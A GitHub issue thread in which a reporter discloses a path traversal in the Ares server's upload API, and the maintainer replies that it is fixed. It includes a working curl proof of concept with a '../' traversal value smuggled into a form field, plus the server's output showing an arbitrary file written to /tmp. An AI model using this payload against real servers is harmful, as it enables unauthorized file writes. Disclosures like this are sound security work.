Closed justinsteven closed 8 years ago
The upload API allows for creation of files on disk in arbitrary locations with arbitrary content.
https://github.com/sweetsoftware/Ares/blob/140c05f83d18af85efb5258530016f83674c5e55/server/server.py#L93-L109
% curl -v -X 'POST' -H 'Content-Type: multipart/form-data; boundary=--------1058259938' --data-binary $'----------1058259938\x0d\x0aContent-Disposition: form-data; name=\"botid\"\x0d\x0a\x0d\x0a1\x0d\x0a----------1058259938\x0d\x0aContent-Disposition: form-data; name=\"src\"\x0d\x0a\x0d\x0a../../../../../../../../tmp/traversal\x0d\x0a----------1058259938\x0d\x0aContent-Disposition: form-data; name=\"uploaded\"; filename=\"uploaded\"\x0d\x0a\x0d\x0awin\x0d\x0a----------1058259938--\x0d\x0a' http://172.17.24.130:8080/api/upload * Hostname was NOT found in DNS cache * Trying 172.17.24.130... * Connected to 172.17.24.130 (172.17.24.130) port 8080 (#0) > POST /api/upload HTTP/1.1 > User-Agent: curl/7.38.0 > Host: 172.17.24.130:8080 > Accept: */* > Content-Type: multipart/form-data; boundary=--------1058259938 > Content-Length: 303 > * upload completely sent off: 303 out of 303 bytes < HTTP/1.1 200 OK < Date: Sun, 13 Dec 2015 07:16:29 GMT < Content-Length: 125 < Content-Type: text/html;charset=utf-8 * Server CherryPy/3.5.0 is not blacklisted < Server: CherryPy/3.5.0 < * Connection #0 to host 172.17.24.130 left intact Uploaded: <a href="../uploads/1/../../../../../../../../tmp/traversal">../uploads/1/../../../../../../../../tmp/traversal</a>
% cat /tmp/traversal win
Hello @justinsteven,
Thanks a lot for your feedback ! I just fixed this along with the botid form field, which was also injectable.
The upload API allows for creation of files on disk in arbitrary locations with arbitrary content.
https://github.com/sweetsoftware/Ares/blob/140c05f83d18af85efb5258530016f83674c5e55/server/server.py#L93-L109